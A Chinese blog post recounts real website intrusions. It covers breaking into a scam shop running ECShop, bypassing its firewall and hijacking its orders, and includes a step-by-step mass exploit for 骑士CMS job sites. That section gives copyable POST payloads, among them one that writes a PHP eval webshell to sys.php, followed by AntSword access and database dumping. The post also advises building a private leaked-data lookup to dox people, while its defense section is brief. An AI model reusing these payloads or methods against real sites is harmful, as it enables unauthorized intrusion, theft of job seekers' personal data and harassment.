实战黑客入侵 获取隐私与防御【长文慎入】

写在前面:图片全部打码,所涉及到的漏洞,均已告知网站管理员。
为了不对别人的业务造成影响,特地延迟发文。
没什么技术含量,三流技术水平就能做到本文的效果。
 
一)被骗的小粉丝
事情的起因很简单,小女粉比较虚荣,买了个高仿手表。
懂行的人都懂,高仿表并不便宜,价格普遍在千元以上。
买回来之后,表不走了,想退货,但卖家只换不退,一来二去,被拉黑了。
哥哥瞅了一眼照片,妹子颜值不错,色迷心窍,遂帮之。
第一步,先收集资料,打开网站任意页面,观察网址,一般能看出对方用了什么程序。
http://xxxx.com/goods-12345.html
作为一个老司机,观察网址的后半部分”goods-12345.html” ,猜测骗子网站应该用的是ecshop这套源码。
新手可以使用在线指纹识别平台,查询目标网站用的程序。
指纹查询:http://whatweb.bugscaner.com/look/

查骗子网站的IP地址和机房信息。
在线查询:ping.chinaz.com

IP地址没变化,说明骗子网站没有使用CDN。
IP地址是香港,大概率没什么防御。
最后一步,收集此IP开放了哪些端口,每个端口都代表着一种服务,开放的端口越多,我们入侵的机会就越多。
随便找个端口扫描软件,输入IP地址,开始扫描,成功得到目标IP的端口。

在浏览器输入IP和端口号,看看有什么反应。

从截图能看出来,对方的服务器是linux系统,安装了宝塔面板。
 
目前已知目标网站的程序源码、真实IP地址、机房信息、主机系统、主机安装的软件,可以开搞了。
百度搜索“程序名+漏洞”,收集整理ecshop相关的一切漏洞信息!

ECShop <= 2.x/3.6.x/3.0.x 漏洞复现:
http://r3start.net/index.php/2018/09/04/146

ECShop全系列版本远程代码执行高危漏洞分析+实战提权:
https://www.freebuf.com/column/185049.html

ECshop 支付宝插件,sql注入漏洞: 
https://blog.csdn.net/u011721501/article/details/40342797

ECshop 漏洞合集:
https://www.seebug.org/appdir/ecshop
2.x/3.6.x/3.0.x  这几个版本,2018年爆出高危漏洞,直接就能拿下网站管理权限。
《》无极领域这篇专门写过,一键获取各类购物网站的数据库,有图有真相。
下图是ecshop的最新漏洞信息。

下图是ecshop官网公布的程序更新记录。

2020.12.1,ecshopV4.1.0爆出个SQL注入漏洞。
2020.12.30,ecshop官方发布了升级补丁。
轻车熟路,十多分钟时间,就拿到了所有想要的信息。
现在,只要知道骗子网站的版本,就能用相应的漏洞进行攻击。
哥哥又使出了目测大法,这个网站实在是太丑了,猜测应该是旧版源码,2.x 或 3.6.x版本。
直接使用查到的漏洞硬上,详细操作方法,上面的链接都有,不再赘述。

如图,宝塔防火墙拦截了攻击代码…
百度搜索“绕过宝塔防火墙”,现成的方案,现学现卖,绕过防火墙,成功获取网站权限。

下载骗子网站的源码,发现有很多老弟入侵这个网站,但都被防火墙拦截了…


打开源码的数据库配置文件,找到若干明文密码。

登陆网站后台,看看订单列表页,居然真的有人买…

还有很多人留言问怎么购买…
这个网站采用 货到付款的形式发货。
黑吃黑的方法有两种:
截单法:监控对方的订单,提前发货,这样便能截单,平均一单500元以上的利润。
替换法:许多网站会留微信二维码,让客户加微信咨询,只需换成自己的二维码,就能截取对方的客户。
事了拂衣去,深藏功与名。
 
二)招聘网信息泄露
骑士CMS是一套招聘网站源码,国内很多招聘网站都在用。
最近这套程序爆出漏洞,哥哥第一时间测试,现场极其惨烈。
漏洞分析:https://xz.aliyun.com/t/8520
大神的漏洞分析非常完整,但手段不够犀利,其实有更简单,更小白的入侵方式,3秒搞定一个网站。
既然已经知道这套源码有漏洞,那么只要找出使用这套源码的招聘网站,就能批量入侵。
搜索神器fofa:https://fofa.so/
常规搜索引擎,用来搜索网页内容。
fofa搜索引擎,可以从代码层面搜索,能搜出所有使用特定代码的网站,可惜是收费的,偶尔用一次,划不来开会员。
作为一个老司机,不想花钱,就得动脑子。
先打开骑士CMS的官网,找到其演示网站,分析页面特征。

发现有个“HR工具箱”的页面,平时在其他网站很少见到,应该算是一个特征。
复制其中一段比较有代表性的文字,直接百度搜索,果然找到很多招聘网站。

连续尝试多次,全部失败…  哥哥一脸懵逼,哪里做错了?
后来发现,原来另一套招聘源码“PHPyun”也有这个页面,估计同行互相模仿…
看来得换个特征,许多网址URL有各自的特点,点击演示网站的各个页面,找比较有代表性的URL。

接下来,使用搜索指令“inurl:XXXX”,查找相同URL的网站,如下图。

这次找对了,这些网站全部是骑士CMS的源码。

0.打开火狐浏览器,安装插件“hackbar”。
1.打开目标网站。
2.按F12进入调试模式,点击”hackbar”插件。
3.点击“Load URL”加载要攻击的网址。

4.手动给加载的网址末尾,加入代码:
index.php?m=home&a=assign_resume_tpl如:http:www.xxx.com/index.php?m=home&a=assign_resume_tpl
5.勾选“post data”选项,在出现的方框中输入攻击代码,下面两行,任意一个都行。
variable=1&tpl=<?php phpinfo();die();?>variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>6. 点击“Execute”,发送攻击指令,如果出现上图的“页面错误”,证明存在漏洞。
7. 将上一步“Post data”中的代码,换成如下代码:
variable=1&tpl=./data/Runtime/Logs/Home/21_01_02.log如果出现下图的页面,那么此网站必然有漏洞。

variable=1&tpl=./data/Runtime/Logs/Home/21_01_01.log
代码中“21_01_01”代表攻击当天的时间。
如果是2021年1月6日,那么攻击时就要改成。
variable=1&tpl=./data/Runtime/Logs/Home/21_01_06.log
通过上面的步骤,我们仅仅只是验证网站存在漏洞,接下来要开始获取网站管理权限。
具体细节参考上面的第5步,换个攻击代码即可。
先在“Post data”的方框中输入下面的攻击代码,点击“Execute”,发送攻击指令。
variable=1&tpl=<?php fputs(fopen("sys.php","w"),"<?php eval($_POST[5521]);?>")?>; ob_flush();?>这个攻击指令的意思是,在网站目录创建一个名为“sys.php”文件,文件内容是一段木马“<?php eval($_POST[5521]);?>”,木马的密码是5521。

然后,在方框中输入上面第7步的代码,点击“Execute”,就能完成攻击。
variable=1&tpl=./data/Runtime/Logs/Home/21_01_02.log
最后,使用“中国蚁剑”,就能进入网站内部。

中国蚁剑:
https://github.com/AntSwordProject/AntSword-Loader
添加木马地址:www.xxxx.com/sys.php 密码:5521


成功获取多个招聘网站的权限,想进入网站数据库,先要找到数据库密码。
百度搜索“骑士CMS 数据库文件”,查到了文件路径,然后从招聘网源码,找到数据库文件。

这个文件里面有数据库用户名和密码,我们用得到的密码连接数据库…
如下,是数据库管理页面,可以随便查管理员/用户的所有信息,图中是管理员的密码字段,可以一键导出所有数据。

整个过程可以实现全自动化,批量入侵,参考无极领域之前的文章。
顺手给管理员发个邮件,通知对方网站存在漏洞。

 
三)灰色产业链
各类数据遍地都是,主要用途是营销和诈骗。
你能想到的任何数据,都有人在暗网出售。
全国上亿车主的信息。


400万带身份证 姓名 性别 地址 的信息。

全国知名大型招聘网站都被黑客搞过,数亿份包含所有信息的简历全部泄露。
主流大型网站,数亿份包含密码的数据,全部泄露。
这一切,花点钱就能买到。
除了营销外,这些数据还有个最大的功能:社工!
简而言之,除非对方不上网,否则可以查到任何人的个人信息。
微博的喷子很多,顺手就能查到对方的手机号…
Q群内也经常有人撕逼,顺手就能查到对方的曾经用过的密码、注册过哪些网站…
很多平台都提供收费查询,效果如下:

查询毕竟要花钱,一些人会选择自建社工库,这样就能无限随便查任何人。
一台普通配置的电脑,配个大点的硬盘,将各种数据库全部下载到硬盘。
安装一款全文搜索软件即可,可选的软件很多 AnyTXT 、BBdoc、filelocator、DocFetcher…
一键批量搜索硬盘的所有文件,可以穿透文档,直接搜索文档内部的文字,支持搜索TXT、Word、Excel、PPT、PDF、HTML…. 各种文件格式。
如此简单,毫无技术含量。
 
四)防御
网站尽量用大服务商的主机,阿里云是真的厉害,能拦截大多数攻击。
安全狗、D盾、宝塔 都提供免费的防火墙,效果很好。
个人隐私泄露,这个是不可逆的,改掉你现在用的所有密码,采用密码分级制度,支付、社交、临时… 根据重要程度,分别用不同的密码。
为了防止被社工,可以在网上发布一些假个人信息。
以上,能阻止大多数攻击,普通个人做到这一步,就足够了。
对大神来说,一切防御都是笑话。
— 完 —
相比技术,黑客思路才是真正的宝藏。
删了很多图片 和 细节,以及敏感内容,确保能顺利发布。
网络不是法外之地,谨言慎行,不要造谣,尤其是喷子,很多时候别人只是懒得搭理,千万别以为没人给你治病。
公众号:无极领域

独孤思维为您提供免费互联网资源,创业教程,副业项目。
独孤思维 » 实战黑客入侵 获取隐私与防御【长文慎入】